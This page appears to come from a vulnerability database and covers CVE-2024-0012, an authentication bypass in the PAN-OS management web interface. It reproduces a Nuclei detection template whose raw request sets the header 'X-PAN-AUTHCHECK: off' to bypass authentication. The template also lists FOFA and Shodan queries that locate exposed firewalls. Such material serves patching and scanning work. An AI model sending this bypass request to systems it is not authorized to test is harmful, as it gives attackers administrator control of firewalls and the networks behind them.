CVE-2024-0012: PAN-OS Management Web Interface - Authentication Bypass

日期: 2025-08-01 | 影响软件: PAN-OS Management Web Interface | POC: 已公开

漏洞描述

An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities

PoC代码[已公开]

id: CVE-2024-0012

info:
  name: PAN-OS Management Web Interface - Authentication Bypass
  author: johnk3r,watchtowr
  severity: critical
  description: |
    An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities
  impact: |
    Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks.
  remediation: |
    Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2024-0012
    - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0012
    cwe-id: CWE-306
    epss-score: 0.943
    epss-percentile: 0.9994
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln

http:
  - raw:
      - |
        GET /php/ztp_gate.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(body, "/scripts/cache/mainui.javascript")'
          - 'contains(header, "PHPSESSID=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022005cfdb2f6a311e49ab6d4c9c76872b6237622c407a8ea93d9a7d4484faaaafbf022100aaf6e59de6a364dd128ea46d47d42d488fc7c53abb00386dc5e0880fbef207c4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-0012.yaml

相关漏洞推荐